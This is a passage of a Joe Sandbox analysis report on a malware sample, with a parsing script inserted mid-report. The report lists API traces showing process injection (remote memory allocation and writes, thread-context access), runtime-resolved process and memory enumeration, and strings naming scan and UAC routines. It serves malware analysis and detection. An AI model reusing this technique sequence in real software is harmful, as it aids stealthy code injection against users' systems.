                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                      • String ID:
                                                                      • API String ID: 1478290883-0
                                                                      • Opcode ID: 60b68c1d3ce256576e3e2e85dc858beef83db7a35e93b7e802aee5a8490637d7
                                                                      • Instruction ID: 991c0b0239387c9a8f04a5f77933a22299a0d44bbf6b846f88576c9294a83211
                                                                      • Opcode Fuzzy Hash: 60b68c1d3ce256576e3e2e85dc858beef83db7a35e93b7e802aee5a8490637d7
                                                                      • Instruction Fuzzy Hash: DF2130B0BC0201BFFB10FBA4EC16B9EB7AEAB04704F500560B555E7690D674AD01AA19
                                                                      APIs
                                                                      • CLSIDFromProgID.OLE32(00000000,?,00000000,02CA6DB9,?,?,?,00000000), ref: 02CA6D99
                                                                        • Part of subcall function 02C94C60: SysFreeString.OLEAUT32(02CAF4A4), ref: 02C94C6E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeFromProgString
                                                                      • String ID:
                                                                      • API String ID: 4225568880-0
                                                                      • Opcode ID: c49ee841b2b55c4e2ff626b9e6d427bdb2f15a24fc537a8c7d60fbb0631a8469
                                                                      • Instruction ID: 40e79258e9b7148082e893e92975f60aebb376e3133d8ed8b94b9dcecb603cea
                                                                      • Opcode Fuzzy Hash: c49ee841b2b55c4e2ff626b9e6d427bdb2f15a24fc537a8c7d60fbb0631a8469
                                                                      • Instruction Fuzzy Hash: 72E02B366007087FEF25EB76DC51D4E77EDDF8A744B6104B1E400D3500D9316E00E8A0
                                                                      APIs
                                                                      • GetModuleFileNameA.KERNEL32(02C90000,?,00000105), ref: 02C95886
                                                                        • Part of subcall function 02C95ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C90000,02CBE790), ref: 02C95AE8
                                                                        • Part of subcall function 02C95ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C90000,02CBE790), ref: 02C95B06
                                                                        • Part of subcall function 02C95ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C90000,02CBE790), ref: 02C95B24
                                                                        • Part of subcall function 02C95ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02C95B42
                                                                        • Part of subcall function 02C95ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02C95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02C95B8B
                                                                        • Part of subcall function 02C95ACC: RegQueryValueExA.ADVAPI32(?,02C95D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02C95BD1,?,80000001), ref: 02C95BA9
                                                                        • Part of subcall function 02C95ACC: RegCloseKey.ADVAPI32(?,02C95BD8,00000000,?,?,00000000,02C95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C95BCB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
Similarity
• API ID: Open$FileModuleNameQueryValue$Close
• String ID:
• API String ID: 2796650324-0
• Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
• Instruction ID: cfc6b651c182c6944ced693c85d06995abdd2f21e1fb4a1c0e6f85087394788a
• Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
• Instruction Fuzzy Hash: BDE06D75A403149FCF10DF98C8C4B5633D8AF48790F440961EC58CF246D7B0DA108BD4

APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02C97DF4
Memory Dump Source
• Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
• Instruction ID: fee4537568e5cd07a94eba6dc9cebebaf388791b46c6a607004a8840d0025864
• Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
• Instruction Fuzzy Hash: 6CD05BB23091507BE624965A6D48EB76BDCCBC6770F10063DF558C7180D7208C05C671

APIs
Memory Dump Source
• Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
Similarity
• API ID: FreeString
• String ID:
• API String ID: 3341692771-0
• Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
• Instruction ID: 85086168871f69ace5433ef1dc153993f1074ae625370b18a7c3aa332c0cebb1
• Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
• Instruction Fuzzy Hash: AAC080B2600A305FFF355699ACC875263CCDF453D8F1800A1D405D7255E360DD00D7B0

APIs
• GetFileAttributesA.KERNEL32(00000000,?,02CB356F,ScanString,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,ScanBuffer,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,Initialize), ref: 02C97E8B
Memory Dump Source
• Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
• Instruction ID: d610a13627caf328f265378df94b1de123524fbdb2e67bbaa1706dea73dd7959
• Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
• Instruction Fuzzy Hash: 79C08CF26226000E1E60A6BC1CCC219628D1BC41387601E21E438CA3C1D326982B3820

APIs
• GetFileAttributesA.KERNEL32(00000000,?,02CB041F,ScanString,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,ScanString,02D17380,02CBB7B8,UacScan,02D17380,02CBB7B8,UacInitialize), ref: 02C97E67
Memory Dump Source
• Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
• Instruction ID: e8bbb1a2f9f0097a5e9dfd4cece4e5ab6f3d734017acf5c30ca7bde1f7c3ef88
• Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
• Instruction Fuzzy Hash: 02C08CF02222000E5E6466BC2CCC249628E0B842387640A21A43CC62E2D33A98AB3810

APIs
• timeSetEvent.WINMM(00002710,00000000,02CBC350,00000000,00000001), ref: 02CBC36C
Memory Dump Source
• Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
Similarity
• API ID: Eventtime
• String ID:
• API String ID: 2982266575-0
• Opcode ID: e8241fa6c9a2fa9856575efb70220218ae34cab103894cf5f05e5b09ea06ce48
• Instruction ID: ef309483eb34946cb755f0328eed241480609b133e0bf457392a2e02df4edf29
• Opcode Fuzzy Hash: e8241fa6c9a2fa9856575efb70220218ae34cab103894cf5f05e5b09ea06ce48
• Instruction Fuzzy Hash: 96C048F27903002AFA1196AA9CC2FB6169DE709B10F940416F608AA2D1D2A35AA05E68

APIs
• SysAllocStringLen.OLEAUT32(00000000,?), ref: 02C94C3F
Memory Dump Source
• Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
Similarity
• API ID: AllocString
• String ID:
• API String ID: 2525500382-0
• Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
• Instruction ID: 12906513031f3abd4a2d03763fa567b067c67633976d072eaf8c3e6c79461699
• Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
• Instruction Fuzzy Hash: 5EB09235208A0229EE2C26620E09736004D1B8128AF8800519E18C80D0EA40C102D836

APIs
• SysFreeString.OLEAUT32(00000000), ref: 02C94C57
Memory Dump Source
• Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
Similarity
• API ID: FreeString
• String ID:
• API String ID: 3341692771-0
• Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
• Instruction ID: 2fda48204c7871f486f4a9e8c6a02d2675efd400fa8b933601ed7aec264498b4
• Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
• Instruction Fuzzy Hash: 06A011B8008A030A8E2A3228002802A2A222FC0280388C0A882000A00A8A2A8002A820

APIs
• VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02C91A03,?,02C91FC1), ref: 02C915E2
Memory Dump Source
• Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: d7f8610d87162dd0ddb34bdc3b589d3d6431b20dcbc9859cfca5eb06fd32ebfc
• Instruction ID: 1c1bbd99c19d7ab5642a5f495e72e1c68a6604ce310ca5c99b3bf562c37f426a
• Opcode Fuzzy Hash: d7f8610d87162dd0ddb34bdc3b589d3d6431b20dcbc9859cfca5eb06fd32ebfc
• Instruction Fuzzy Hash: C9F06DF0B413016FDB0ADFB9A9457017BE2EB8B344F148579D609DB788E7B18802CB80

APIs
• VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02C91FC1), ref: 02C916A4
Memory Dump Source
• Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 46f8d7c8e4d2c581d5b7f610326bb0e9426334d32c740506c526deab87ddc408
• Instruction ID: c4a8cebcd3166292355e39ff5eb7627af556b79a7855a0b3500b1055d2442b3e
• Opcode Fuzzy Hash: 46f8d7c8e4d2c581d5b7f610326bb0e9426334d32c740506c526deab87ddc408
• Instruction Fuzzy Hash: D6F090B2A446967BDB119E5A9C85782BB98FB40314F090139F90897B40D7B0EC11CBD4

APIs
• VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02C91FE4), ref: 02C91704
Memory Dump Source
• Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: d6c2458312347aa595fb689e2abe1dbf453eeb0f6dbee42a553ddb2efc2b5c48
• Instruction ID: 64524e9809249ef640c9872a7b3220e1a98271b0916244c08c91b7a5745c09b6
• Opcode Fuzzy Hash: d6c2458312347aa595fb689e2abe1dbf453eeb0f6dbee42a553ddb2efc2b5c48
• Instruction Fuzzy Hash: D0E086753003036FDF105A7A5D497126BDCEB45664F1C4475F509DB281D2E0E8108B60

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02CAADA3,?,?,02CAAE35,00000000,02CAAF11), ref: 02CAAB30
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02CAAB48
• GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02CAAB5A
• GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02CAAB6C
• GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02CAAB7E
• GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02CAAB90
• GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02CAABA2
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 02CAABB4
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02CAABC6
• GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02CAABD8
• GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02CAABEA
• GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02CAABFC
• GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02CAAC0E
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 02CAAC20
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02CAAC32
• GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02CAAC44
• GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02CAAC56
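The script below is an added example, not part of this Joe Sandbox report. It parses "APIs" lines in the format the records above use (the lines are copied inline as constructed input), lists the names the function above resolves at runtime through GetProcAddress, decodes the VirtualAlloc, VirtualFree and timeSetEvent arguments from the earlier records against the standard Win32 constants, and rebuilds the record's "String ID" field. The String ID reconstruction (string arguments de-duplicated, sorted by code point and joined with "$") is an assumption about how the field is formed; it reproduces the value printed in this record.

```python
import re
from dataclasses import dataclass

# Constructed input: API lines copied from the records above, indentation removed.
SAMPLE_LINES = """
• GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02CAADA3,?,?,02CAAE35,00000000,02CAAF11), ref: 02CAAB30
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02CAAB48
• GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02CAAB5A
• GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02CAAB6C
• GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02CAAB7E
• GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02CAAB90
• GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02CAABA2
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 02CAABB4
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02CAABC6
• GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02CAABD8
• GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02CAABEA
• GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02CAABFC
• GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02CAAC0E
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 02CAAC20
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02CAAC32
• GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02CAAC44
• GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02CAAC56
• VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02C91A03,?,02C91FC1), ref: 02C915E2
• VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02C91FC1), ref: 02C916A4
• VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02C91FE4), ref: 02C91704
• timeSetEvent.WINMM(00002710,00000000,02CBC350,00000000,00000001), ref: 02CBC36C
"""

# One report line: "<Api>.<MODULE>(<args>), ref: <hex address>"
_LINE = re.compile(r"^\s*•?\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")
_HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")  # how the report prints numeric arguments

# Standard Win32 values for VirtualAlloc/VirtualFree flags and page protections.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x4000: "MEM_DECOMMIT",
             0x8000: "MEM_RELEASE", 0x100000: "MEM_TOP_DOWN"}
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
                0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int

    def arg_int(self, i):
        """Numeric value of argument i; None when the report shows '?' or a string."""
        if i >= len(self.args) or not _HEX8.match(self.args[i]):
            return None
        return int(self.args[i], 16)


def parse_api_lines(text):
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if m:
            name, module, raw_args, ref = m.groups()
            calls.append(ApiCall(name, module, raw_args.split(","), int(ref, 16)))
    return calls


def _flag_names(value, table):
    return [name for bit, name in sorted(table.items()) if value & bit]


def decode_virtual_alloc(call):
    """VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)."""
    alloc, protect = call.arg_int(2), call.arg_int(3)
    return {
        "size": call.arg_int(1),
        "alloc_type": None if alloc is None else _flag_names(alloc, MEM_FLAGS),
        # mask off modifiers such as PAGE_GUARD (0x100) before the table lookup
        "protect": None if protect is None else PAGE_PROTECT.get(protect & 0xFF),
        "executable": protect is not None and bool(protect & 0xF0),
    }


def decode_virtual_free(call):
    """VirtualFree(lpAddress, dwSize, dwFreeType)."""
    free = call.arg_int(2)
    return None if free is None else _flag_names(free, MEM_FLAGS)


def decode_time_set_event(call):
    """timeSetEvent(uDelay, uResolution, lpTimeProc, dwUser, fuEvent); bit 0 of fuEvent is TIME_PERIODIC."""
    ev = call.arg_int(4)
    return {"delay_ms": call.arg_int(0), "callback": call.arg_int(2),
            "periodic": ev is not None and bool(ev & 1)}


def resolved_imports(calls):
    """Names passed to GetProcAddress, in the order the function resolves them."""
    return [c.args[1] for c in calls if c.name == "GetProcAddress" and len(c.args) > 1]


def string_id(calls):
    """Assumed construction of the report's String ID: string arguments, sorted, '$'-joined."""
    strings = {a for c in calls for a in c.args if a != "?" and not _HEX8.match(a)}
    return "$".join(sorted(strings))
```

Running it over the lines above shows that the function resolves sixteen Toolhelp32 entry points at runtime rather than importing them statically, that the timer fires every 10000 ms (0x2710) with TIME_PERIODIC set, and that both VirtualAlloc calls request PAGE_READWRITE (the second also MEM_TOP_DOWN); neither of the two allocations shown here asks for an executable protection.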
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$HandleModule
                                                                      • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                      APIs
                                                                        • Part of subcall function 02CA89D0: FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02D1738C,Function_0000662C,00000004,02D1739C,02D1738C,05F5E103,00000040,02D173A0,741D0000,00000000,00000000), ref: 02CA8AAA
                                                                        • Part of subcall function 02CA8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CA8814
                                                                      • GetThreadContext.KERNEL32(00000000,02D17424,ScanString,02D173A8,02CAA93C,UacInitialize,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,UacInitialize,02D173A8), ref: 02CA9602
                                                                        • Part of subcall function 02CA7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CA7A9F
                                                                        • Part of subcall function 02CA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CA7DEC
